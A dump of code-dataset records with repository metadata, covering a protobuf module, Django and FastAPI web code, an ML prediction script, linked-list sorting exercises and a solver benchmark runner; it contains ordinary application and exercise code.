name='Subscriber',
full_name='notify.Subscriber',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='notify.Subscriber.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='admin', full_name='notify.Subscriber.admin', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callback', full_name='notify.Subscriber.callback', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ensName', full_name='notify.Subscriber.ensName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='procNum', full_name='notify.Subscriber.procNum', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='msgType', full_name='notify.Subscriber.msgType', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retry', full_name='notify.Subscriber.retry', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subscribeInfo', full_name='notify.Subscriber.subscribeInfo', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=81,
serialized_end=252,
)
_SUBSCRIBER.fields_by_name['subscribeInfo'].message_type = object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2._SUBSCRIBEINFO
DESCRIPTOR.message_types_by_name['Subscriber'] = _SUBSCRIBER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Subscriber = _reflection.GeneratedProtocolMessageType('Subscriber', (_message.Message,), {
'DESCRIPTOR' : _SUBSCRIBER,
'__module__' : 'subscriber_pb2'
# @@protoc_insertion_point(class_scope:notify.Subscriber)
})
_sym_db.RegisterMessage(Subscriber)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
[
"[email protected]"
] | |
1b33a0d2e211750824ab74b353f3eec8b0a32f06
|
6e2dfbf50c1def19cd6ae8e536a2ddb954a5ad63
|
/predict.py
|
3e96f112a8763f74066d46caa470404c48356c44
|
[
"BSD-3-Clause",
"LGPL-2.1-or-later",
"MIT",
"GPL-3.0-only",
"Apache-2.0"
] |
permissive
|
boshining/NeuronBlocks
|
9d71f087772eb17c3a4130d0374818cfd80d976f
|
74fbb8658fb3f1cffea5c9bc84b2a1da59c20dd9
|
refs/heads/master
| 2020-05-27T16:24:10.244042 | 2019-08-06T07:37:55 | 2019-08-06T07:37:55 | 188,699,703 | 0 | 0 |
MIT
| 2019-08-06T08:19:55 | 2019-05-26T15:23:06 |
Python
|
UTF-8
|
Python
| false | false | 3,096 |
py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from settings import ProblemTypes, version
import os
import argparse
import logging
from ModelConf import ModelConf
from problem import Problem
from LearningMachine import LearningMachine
def main(params):
conf = ModelConf('predict', params.conf_path, version, params, mode=params.mode)
problem = Problem('predict', conf.problem_type, conf.input_types, None,
with_bos_eos=conf.add_start_end_for_seq, tagging_scheme=conf.tagging_scheme, tokenizer=conf.tokenizer,
remove_stopwords=conf.remove_stopwords, DBC2SBC=conf.DBC2SBC, unicode_fix=conf.unicode_fix)
if os.path.isfile(conf.saved_problem_path):
problem.load_problem(conf.saved_problem_path)
logging.info("Problem loaded!")
logging.debug("Problem loaded from %s" % conf.saved_problem_path)
else:
raise Exception("Problem does not exist!")
if len(conf.predict_fields_post_check) > 0:
for field_to_chk in conf.predict_fields_post_check:
field, target = field_to_chk.split('@')
if not problem.output_dict.has_cell(target):
raise Exception("The target %s of %s does not exist in the training data." % (target, field_to_chk))
lm = LearningMachine('predict', conf, problem, vocab_info=None, initialize=False, use_gpu=conf.use_gpu)
lm.load_model(conf.previous_model_path)
logging.info('Predicting %s with the model saved at %s' % (conf.predict_data_path, conf.previous_model_path))
lm.predict(conf.predict_data_path, conf.predict_output_path, conf.predict_file_columns, conf.predict_fields)
logging.info("Predict done! The predict result: %s" % conf.predict_output_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Prediction')
parser.add_argument("--conf_path", type=str, help="configuration path")
parser.add_argument("--predict_data_path", type=str, help='specify another predict data path, instead of the one defined in configuration file')
parser.add_argument("--previous_model_path", type=str, help='load model trained previously.')
parser.add_argument("--predict_output_path", type=str, help='specify another prediction output path, instead of conf[outputs][save_base_dir] + conf[outputs][predict_output_name] defined in configuration file')
parser.add_argument("--log_dir", type=str)
parser.add_argument("--batch_size", type=int, help='batch_size of each gpu')
parser.add_argument("--mode", type=str, default='normal', help='normal|philly')
parser.add_argument("--force", type=bool, default=False, help='Allow overwriting if some files or directories already exist.')
parser.add_argument("--disable_log_file", type=bool, default=False, help='If True, disable log file')
parser.add_argument("--debug", type=bool, default=False)
params, _ = parser.parse_known_args()
assert params.conf_path, 'Please specify a configuration path via --conf_path'
if params.debug is True:
import debugger
main(params)
|
[
"[email protected]"
] | |
c6ddac9e303b762b38d565c374ec231de78f1052
|
aac63f0f178945e8109f74ebb9bbb59165185172
|
/news/urls.py
|
e0d7f3b27f0854cb4fa0912eb93b73f36dddd8c4
|
[] |
no_license
|
okumujustine/hacker-news-clone
|
587f7e88f53d576ee58e5dfff78f4d18e046b4db
|
7f70d18325c7627237de719e04bdde9ad75a8d5d
|
refs/heads/main
| 2023-01-02T13:41:37.825072 | 2020-11-04T14:52:41 | 2020-11-04T14:52:41 | 310,032,396 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 810 |
py
|
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views
from apps.core.views import signup
from apps.story.views import frontpage, search, submit, newest, vote, story
urlpatterns = [
path('', frontpage, name='frontpage'),
path('s/<int:story_id>/vote/', vote, name='vote'),
path('s/<int:story_id>/', story, name='story'),
path('u/', include('apps.userprofile.urls')),
path('newest/', newest, name='newest'),
path('search/', search, name='search'),
path('submit/', submit, name='submit'),
path('signup/', signup, name='signup'),
path('login/', views.LoginView.as_view(template_name='core/login.html'), name='login'),
path('logout/', views.LogoutView.as_view(), name='logout'),
path('admin/', admin.site.urls),
]
|
[
"[email protected]"
] | |
fc6b3d226bbf27414b9873a6166718c97218c228
|
16fcf452e6165a0de5bc540c57b6e6b82d822bb1
|
/Learntek_code/4_June_18/while2.py
|
7a9891325874d47ce4779e35a821980c21e374a2
|
[] |
no_license
|
mohitraj/mohitcs
|
e794e9ad2eb536e3b8e385fb8d222e8ade95c802
|
d6399b2acf69f5667c74f69715a0b55060bf19d1
|
refs/heads/master
| 2021-09-09T00:21:23.099224 | 2021-09-07T16:39:07 | 2021-09-07T16:39:07 | 87,798,669 | 5 | 6 | null | null | null | null |
UTF-8
|
Python
| false | false | 356 |
py
|
import getpass
print "Hello World "
print "Please enter the password\t"
pass1 = getpass.getpass()
flag1 =0
num =0
while True:
if pass1=="India":
print "Welcome in India"
break
else :
print "Wrong password type again"
num = num+1
print num
if num==3:
break
print "Please enter the password again\t"
pass1 = getpass.getpass()
|
[
"[email protected]"
] | |
525379ed03b39dc09421131f1b21c85a278b744d
|
ab1f25e6266a71ea23f1d3e04ec8635ae550d1df
|
/HW6/Task-1/temp_HW6/person.py
|
9dc7cb45a9f296a612d9c858867a544884bb3914
|
[] |
no_license
|
Pavlenkovv/e-commerce
|
5143d897cf779007181a7a7b85a41acf3dfc02c4
|
0d04d7dfe3353716db4d9c2ac55b0c9ba54daf47
|
refs/heads/master
| 2023-01-25T03:13:41.238258 | 2020-12-06T22:16:53 | 2020-12-06T22:16:53 | 313,103,199 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 293 |
py
|
class Person:
"""Any Person"""
def __init__(self, surname=None, name=None, age=None, *args, **kwargs):
self.surname = surname
self.name = name
self.age = age
def __str__(self):
return f'Surname: {self.surname}, name: {self.name}, age: {self.age}'
|
[
"[email protected]"
] | |
1dee9eaec67b0c0952431a177322b33833f669d8
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/contrib/cv/detection/GCNet/dependency/mmdet/models/detectors/point_rend.py
|
e9d1d4b639d2027b566b58ab2b44017d39b48e54
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 |
Apache-2.0
| 2022-10-15T09:29:12 | 2022-04-20T04:11:18 |
Python
|
UTF-8
|
Python
| false | false | 1,366 |
py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ..builder import DETECTORS
from .two_stage import TwoStageDetector
@DETECTORS.register_module()
class PointRend(TwoStageDetector):
"""PointRend: Image Segmentation as Rendering
This detector is the implementation of
`PointRend <https://arxiv.org/abs/1912.08193>`_.
"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None):
super(PointRend, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
|
[
"[email protected]"
] | |
1f67fe7255fb1282c3fcc2652a59677474c9bda8
|
784936ad8234b5c3c20311ce499551ee02a08879
|
/lab4/patterns/pattern04.py
|
3fcf0f3989546c699ae05960faf3d52c1bb8cec2
|
[] |
no_license
|
jonlin97/CPE101
|
100ba6e5030364d4045f37e317aa05fd6a06cb08
|
985d64497a9861f59ab7473322b9089bfa57fd10
|
refs/heads/master
| 2021-06-16T01:31:31.025153 | 2017-02-28T19:29:11 | 2017-02-28T19:29:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 185 |
py
|
import driver
def letter(row, col):
if row in [2,3,4] and col in [3,4,5,6]:
return 'M'
else:
return 'S'
if __name__ == '__main__':
driver.comparePatterns(letter)
|
[
"[email protected]"
] | |
1ca12f40b6da6c54896751b8fdc0c2ed2ce7ded5
|
d2fb1de19bb55e3b03db94b4fdce396fe56a223e
|
/caesure/ecdsa_secp256k1.py
|
a24f78a2d48632ae1799cf42702c8927e03412a2
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
mikegogulski/caesure
|
83a2a0a5d9b7c16339d54076bc54d351dbe0c3e4
|
ccee420665e3fb4e7a005241efc6832ead4b90d8
|
refs/heads/master
| 2021-01-22T00:02:40.058902 | 2014-11-04T05:54:25 | 2014-11-04T05:54:25 | 26,273,215 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 292 |
py
|
# -*- Mode: Python -*-
import caesure.secp256k1
from bitcoin import dhash
class KEY:
def __init__ (self):
self.p = None
def set_pubkey (self, key):
self.p = key
def verify (self, data, sig):
return caesure.secp256k1.verify (self.p, dhash (data), sig)
|
[
"[email protected]"
] | |
d99ff535dc1910cb9019d6f11a9939d50cc55669
|
acb7228022a36218846bc3f431e7a45057bb581d
|
/mappingpedia/migrations/0003_auto_20180214_1501.py
|
9c5d9d620a594b0c3db4110b7ac1bfa980b4358a
|
[
"Apache-2.0"
] |
permissive
|
oeg-upm/mappingpedia-userinterface
|
c6ba106f3072a4d37c1c34573e2d72882429dd1b
|
1738b32f704bbf66f1ed8b78c99c71d49b208d43
|
refs/heads/master
| 2021-11-03T14:34:39.044575 | 2019-04-26T07:02:11 | 2019-04-26T07:02:11 | 111,107,643 | 3 | 1 |
Apache-2.0
| 2018-02-28T11:55:04 | 2017-11-17T13:40:44 |
HTML
|
UTF-8
|
Python
| false | false | 692 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-02-14 15:01
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mappingpedia', '0002_auto_20180214_1409'),
]
operations = [
migrations.RenameField(
model_name='executionprogress',
old_name='result_page',
new_name='result_url',
),
migrations.AlterField(
model_name='executionprogress',
name='timestamp',
field=models.DateTimeField(default=datetime.datetime(2018, 2, 14, 15, 0, 54, 799127)),
),
]
|
[
"[email protected]"
] | |
f1da8b2e8cd2b49b4089ef7c8d1561bd7405bb9c
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/380/usersdata/348/85739/submittedfiles/testes.py
|
6041d85fcddfaab01edb49cb3b652c18ffee68af
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 148 |
py
|
b = 0
a = 100
for i in range(0,a,1):
if (a%(i+1)) !=0:
b = b + 1
print(b)
|
[
"[email protected]"
] | |
ea35143cdc0111cd7637ce9c09e8694f82c80c7d
|
3d91c09bca4e68bf7a527cb40ed70ac208495b93
|
/library/migrations/0004_auto_20201128_0844.py
|
faa172d3cb83cc52c23cfb2b00723338c7b633e8
|
[] |
no_license
|
Kaik-a/OCR-Projet13
|
02e9d8c9228d6d7a09013b4ab2570304c01dfc28
|
ac339002279397f43316e33a869cce797b5d92b2
|
refs/heads/main
| 2023-02-17T09:39:11.184120 | 2021-01-11T15:50:58 | 2021-01-11T15:50:58 | 311,875,691 | 0 | 0 | null | 2021-01-11T15:50:59 | 2020-11-11T05:51:34 |
CSS
|
UTF-8
|
Python
| false | false | 368 |
py
|
# Generated by Django 3.1.3 on 2020-11-28 08:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("library", "0003_auto_20201128_0823"),
]
operations = [
migrations.AlterUniqueTogether(
name="lendedgame",
unique_together={("owned_game", "return_date")},
),
]
|
[
"[email protected]"
] | |
7f271a553860b8386270632196e05e93106e5631
|
5cbf6cf8a9eb958391c371c6181c49155533b6ba
|
/leetcode_链表_18.排序链表(快排+归并).py
|
4825959173e4f80a6369e29f6246967d3a75fdf9
|
[] |
no_license
|
cmychina/Leetcode
|
dec17e6e5eb25fad138a24deba1d2f087db416f7
|
18e6ac79573b3f535ca5e3eaa477eac0e60bf510
|
refs/heads/master
| 2022-12-20T16:09:46.709808 | 2020-09-28T04:04:54 | 2020-09-28T04:04:54 | 282,446,932 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,223 |
py
|
"""
链表的快排与归并排序
"""
from linklist import *
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
归并排序,要找中点,链表中点用快慢指针
:param head:
:return:
"""
if not head or not head.next:
return head
slow,fast=head,head
while fast.next and fast.next.next:
slow=slow.next
fast=fast.next.next
right=self.sortList(slow.next)
slow.next=None#切断
left=self.sortList(head)
return self.mergesort(left,right)
def mergesort(self,head1,head2):
ans=ListNode(-1)
pre=ans
while head1 and head2:
if head1.val<=head2.val:
pre.next=head1
head1=head1.next
pre=pre.next
else:
pre.next=head2
head2=head2.next
pre=pre.next
if head1:
pre.next=head1
if head2:
pre.next=head2
return ans.next
class Solution:
def sortList(self, head: ListNode) -> ListNode:
"""
快排
:param head:
:return:
"""
if not head or not head.next:
return head
ans = ListNode(-1)
ans.next = head
return self.quicksort(ans, None)
def quicksort(self, head, end):
if head == end or head.next == end or head.next.next == end:
return head
tmp = ListNode(-1)
partition = head.next
p = partition
#用来记录排序结果?
t = tmp
while p.next!=end:
if p.next.val < partition.val:
t.next = p.next
t = t.next
p.next = p.next.next
#大于partitio的val,不操作
else:
p = p.next
t.next = head.next#head.next 是未排序前
head.next = tmp.next
self.quicksort(head, partition)
self.quicksort(partition, end)
return head.next
if __name__=="__main__":
a=[4,5,3,6,1,7,8,2]
l1=convert.list2link(a)
s=Solution()
out=s.sortList(l1)
print(convert.link2list(out))
|
[
"[email protected]"
] | |
e71f2ad4ff01abe55a1af73d50b4b2075d281736
|
b2f3b7b3be11a63d5d1ddfea945439402394efe7
|
/routers/stock_dividends.py
|
867f17a070eb93246f322a74b193cce05c8808cc
|
[] |
no_license
|
leonardoo/fast_api_stock_bvc
|
a8a57b9e2e3822c84829a91702ba2ce73c6ff439
|
c91b9267360ed0aacd2e98a1da9b1e3b160dc837
|
refs/heads/main
| 2023-08-13T08:05:41.064300 | 2021-10-08T00:05:14 | 2021-10-08T00:05:14 | 383,130,473 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,012 |
py
|
from typing import List
from datetime import datetime
from fastapi import APIRouter, Depends
from starlette.responses import JSONResponse
from models.stock import Stock
from models.stock_dividends import StockDividends
from models.users import User
from plugins.fastapi_users import fastapi_users
router = APIRouter(
prefix="/dividends",
tags=["dividends"],
)
def get_current_year():
return datetime.now().year
@router.post("/", response_model=StockDividends)
async def create_dividend(dividend: StockDividends, user: User = Depends(fastapi_users.current_user(verified=True))):
stock = await Stock.objects.get_or_none(nemo=dividend.nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
dividend_data = dividend.dict(exclude_unset=True)
total = dividend_data.pop("total")
paid_amount = dividend_data.pop("paid_amount")
dividend_data.pop("nemo")
dividend_data["ex_dividend_date"] = str(dividend_data["ex_dividend_date"])
dividend_data["paid_at"] = str(dividend_data["paid_at"])
dividend_data["stock_id"] = stock.id
dividend_obj = await StockDividends.objects.get_or_create(**dividend_data)
dividend_obj.total = total
dividend_obj.paid_amount = paid_amount
await dividend_obj.update()
return dividend_obj
@router.get("/", response_model=List[StockDividends])
async def get_list_dividends():
year = get_current_year()
data = StockDividends.objects.filter(paid_at__gte=f"{year}-01-01", paid_at__lt=f"{year+1}-01-01")
data = data.select_related("stock_id")
data = data.order_by("paid_at")
return await data.all()
@router.get("/{nemo}", response_model=List[StockDividends])
async def get_stock(nemo: str):
stock = await Stock.objects.get_or_none(nemo=nemo)
if not stock:
return JSONResponse(status_code=404, content={"message": "Stock not found"})
data = StockDividends.objects
data = data.filter(stock_id=stock.id)
return await data.all()
|
[
"[email protected]"
] | |
30afc63d7c5839fede97f2925e6bbb6f93e81b28
|
e65453aecb1b64f75a4a6eee7ca1328984773d5d
|
/Test/test1.py
|
662d8a12291d456ee624881943ae9a53dc213b46
|
[] |
no_license
|
huyendtt58/raSAT
|
1a9a0a1c05b81877416e82c9c102ae92c6d80931
|
b4f7c8995eef71bd099046c761ea19ea904fd18d
|
refs/heads/master
| 2021-01-19T14:27:24.036231 | 2017-02-23T12:36:52 | 2017-02-23T12:36:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,520 |
py
|
import fnmatch
import os
import subprocess
import csv
matches = []
def run(directory, initLowerBound, initUpperBound, initSbox, timeout, resultFile):
lowerBound = initLowerBound
upperBound = initUpperBound
#sbox = initSbox
solvedProblems = 0
with open(os.path.join(directory, resultFile), 'wb') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', 'raSATResult', 'EQ', 'NEQ'])
csvfile.close()
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.smt2'):
print "Checking ", filename
sbox = initSbox * 10
nVars = 0
maxVars = 0
nAPIs = 0
iaTime = 0
testingTime=0
usTime=0
parsingTime=0
decompositionTime=0
miniSATTime=0
miniSATVars = 0;
time=0
miniSATCalls=0
miniSATClauses = 0
raSATClauses=0
decomposedLearnedClauses=0
UNSATLearnedClauses=0
unknownLearnedClauses=0
result='unknown'
raSATResult = 'unknown'
isEquation = '0'
isNotEquation = '0'
try:
f = open(os.path.join(root, filename))
for line in f:
if line.startswith('(set-info :status'):
result = line[18:len(line)-2]
f.close()
except IOError:
result = 'unknown'
bounds = ['lb=-1 1', 'lb=-10 10', 'lb=-inf inf']
boundsNum = len(bounds)
boundIndex = 0
while (raSATResult != 'sat' and time < timeout and boundIndex < boundsNum):
if raSATResult == 'unknown':
sbox = sbox / 10
subprocess.call(["./raSAT", os.path.join(root, filename), bounds[boundIndex], 'sbox=' + str(sbox), 'tout=' + str(timeout-time)])
try:
with open(os.path.join(root, filename) + '.tmp', 'rb') as csvfile:
reader = csv.reader(csvfile)
output = reader.next()
nVars = output[1]
maxVars = output[2]
nAPIs = output[3]
time += float(output[4])
iaTime += float(output[5])
testingTime += float(output[6])
usTime += float(output[7])
parsingTime += float(output[8])
decompositionTime += float(output[9])
miniSATTime += float(output[10])
miniSATVars += float(output[11])
miniSATClauses += float(output[12])
miniSATCalls += float(output[13])
raSATClauses += float(output[14])
decomposedLearnedClauses += float(output[15])
UNSATLearnedClauses += float(output[16])
unknownLearnedClauses += float(output[17])
isEquation = output[18]
isNotEquation = output[19]
raSATResult = output[20]
csvfile.close()
except IOError:
raSATResult = 'timeout'
if raSATResult == 'unsat':
boundIndex += 1
if raSATResult == 'sat' or raSATResult == 'unsat':
solvedProblems += 1
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow([os.path.join(root, filename), nVars, maxVars, nAPIs, time, iaTime, testingTime, usTime, parsingTime, decompositionTime, miniSATTime, miniSATVars, miniSATClauses, miniSATCalls, raSATClauses, decomposedLearnedClauses, UNSATLearnedClauses, unknownLearnedClauses, result, raSATResult, isEquation, isNotEquation])
csvfile.close()
try:
os.remove(os.path.join(root, filename) + '.tmp')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.in')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.out')
except OSError:
pass
try:
os.remove(os.path.join(root, filename)[:-5] + '.rs')
except OSError:
pass
with open(os.path.join(directory, resultFile), 'a') as csvfile:
spamwriter = csv.writer(csvfile)
spamwriter.writerow(['Problem', 'nVars', 'maxVars', 'nAPIs', 'time', 'iaTime', 'testingTime', 'usCoreTime', 'parsingTime', 'decompositionTime', 'miniSATTime', 'miniSATVars', 'miniSATClauses', 'miniSATCalls', 'raSATClauses', 'decomposedLearnedClauses', 'UNSATLearnedClauses', 'unknownLearnedClauses', 'result', solvedProblems, 'EQ', 'NEQ'])
csvfile.close()
#run ('zankl', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('QF_NRA/meti-tarski', -10, 10, 0.1, 500, 'with_dependency_sensitivity_restartSmallerBox_boxSelectionUsingSensitivity.xls')
#run ('Test/meti-tarski', -1, 1, 0.1, 60, 'result.xls')
#run ('Test/zankl', -10, 10, 0.1, 30, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/AProVE', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/calypto', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/leipzig', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NIA/mcm', -10, 10, 0.1, 60, 'result.xls')
#run ('Test/smtlib-20140121/QF_NRA/hycomp', -10, 10, 0.1, 60, '1-5-8.csv')
run ('Test/smtlib-20140121/QF_NRA/meti-tarski', -10, 10, 0.1, 60, '1-5-8-11.csv')
#run ('Test/test', -10, 10, 0.1, 60, 'result.csv')
|
[
"[email protected]"
] | |
95292dbab6b727fc93cbd5ed860178fecee84ca4
|
752116ef4b69a3049fef0cfe9b3d212548cc81b1
|
/sources/actions/watch/describe.py
|
ef16f46eb7e4fe787faa620233f6f13455fd54fb
|
[] |
no_license
|
VDOMBoxGroup/runtime2.0
|
e54af4af7a642f34b0e07b5d4096320494fb9ae8
|
cb9932f5f75d5c6d7889f26d58aee079b4127299
|
refs/heads/develop
| 2023-07-07T11:06:10.817093 | 2023-07-03T06:11:55 | 2023-07-03T06:11:55 | 62,622,255 | 0 | 12 | null | 2023-05-23T02:55:00 | 2016-07-05T09:09:48 |
Python
|
UTF-8
|
Python
| false | false | 4,418 |
py
|
from logs import console
from utils.structure import Structure
from utils.parsing import VALUE, Parser, ParsingException
from ..auxiliary import section, show
from .auxiliary import query
REQUEST = "<action name=\"describe\">%s</action>"
SOURCE_OBJECTS_OPTION = "<option name=\"source\">objects</option>"
SOURCE_GARBAGE_OPTION = "<option name=\"source\">garbage</option>"
SOURCE_CHANGES_OPTION = "<option name=\"source\">changes</option>"
FILTER_BY_SERVER_OPTION = "<option name=\"filter\">server</option>"
SORT_BY_NAME = "SORT BY NAME"
SORT_BY_COUNTER = "SORT BY COUNTYER"
SORT_VALUES = {
"n": SORT_BY_NAME,
"name": SORT_BY_NAME,
"c": SORT_BY_COUNTER,
"counter": SORT_BY_COUNTER
}
ORDER_BY_ASCENDING = "ORDER BY ASCENDING"
ORDER_BY_DESCENDING = "ORDER BY DESCENDING"
ORDER_VALUES = {
"a": ORDER_BY_ASCENDING,
"asc": ORDER_BY_ASCENDING,
"ascending": ORDER_BY_ASCENDING,
"d": ORDER_BY_DESCENDING,
"desc": ORDER_BY_DESCENDING,
"descending": ORDER_BY_DESCENDING
}
def sort_by_name(x):
return x[0]
def sort_by_counter(x):
return x[1], -x[2], x[0]
def builder(parser):
# <reply>
def reply():
result = Structure(entries=None)
# <descriptions>
def descriptions():
result.entries = []
# <subgroup>
def subgroup(name):
subgroup = []
result.entries.append((name, subgroup))
# <description>
def description(object):
value = yield VALUE
subgroup.append((object, value))
# </description>
return description
# </subgroup>
return subgroup
# </descriptions>
yield descriptions
parser.accept(result)
# </reply>
return reply
def run(address=None, port=None, timeout=None,
all=False, sort=None, order=None, limit=None,
objects=False, garbage=False, changes=False):
"""
describe server object changes
:param address: specifies server address
:key int port: specifies server port
:key float timeout: specifies timeout to wait for reply
:key switch all: disable objects filtering
:key sort: sort entries by "name" or by "counter"
:key order: sort entries "asc"ending or "desc"ending
:key int limit: limit output
:key switch objects: use all objects
:key switch garbage: use objects from garbage
:key switch changes: use changes
"""
try:
if sum((objects, garbage, changes)) > 1:
raise Exception("Options \"objects\", \"garbage\" and \"changes\" are mutually exclusive")
sort = SORT_VALUES.get((sort or "").lower(), SORT_BY_NAME)
if sort is SORT_BY_COUNTER and order is None:
order = "desc"
order = ORDER_VALUES.get((order or "").lower(), ORDER_BY_ASCENDING)
options = "".join(filter(None, (
SOURCE_OBJECTS_OPTION if objects else None,
SOURCE_GARBAGE_OPTION if garbage else None,
SOURCE_CHANGES_OPTION if changes else None,
None if all else FILTER_BY_SERVER_OPTION,)))
request = REQUEST % options
message = query("describe objects", address, port, request, timeout=timeout)
parser = Parser(builder=builder, notify=True, supress=True)
result = parser.parse(message)
if not result:
raise Exception("Incorrect response")
except ParsingException as error:
console.error("unable to parse, line %s: %s" % (error.lineno, error))
except Exception as error:
console.error(error)
else:
console.write()
with section("objects"):
if result.entries:
key = sort_by_counter if sort is SORT_BY_COUNTER else sort_by_name
reverse = order is ORDER_BY_DESCENDING
entries = sorted(result.entries, key=key, reverse=reverse)
if limit is not None:
entries = entries[:limit]
for name, subgroup in entries:
with section(name):
for object, description in subgroup:
with section(object, lazy=False):
for part in description.split(" < "):
show(part, longer=True)
else:
show("no objects")
|
[
"[email protected]"
] | |
87cee6b3fc7d259b87a0cb05ee0fee88ed14e10f
|
9ae2d337cbfa56768580187cc507f9c3c4ace1a8
|
/test/test_meshzoo.py
|
abc4f1e9a37a6ea0c9ac22e5aea80e860fa44c3f
|
[
"MIT"
] |
permissive
|
tongluocq/meshzoo
|
5a734012e02f70bdf37147a3520b733f5095da02
|
46d3a999b7537fdcea92cd19ae53920b8639b0b3
|
refs/heads/master
| 2020-09-26T11:21:16.086387 | 2019-10-16T16:36:25 | 2019-10-16T16:36:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
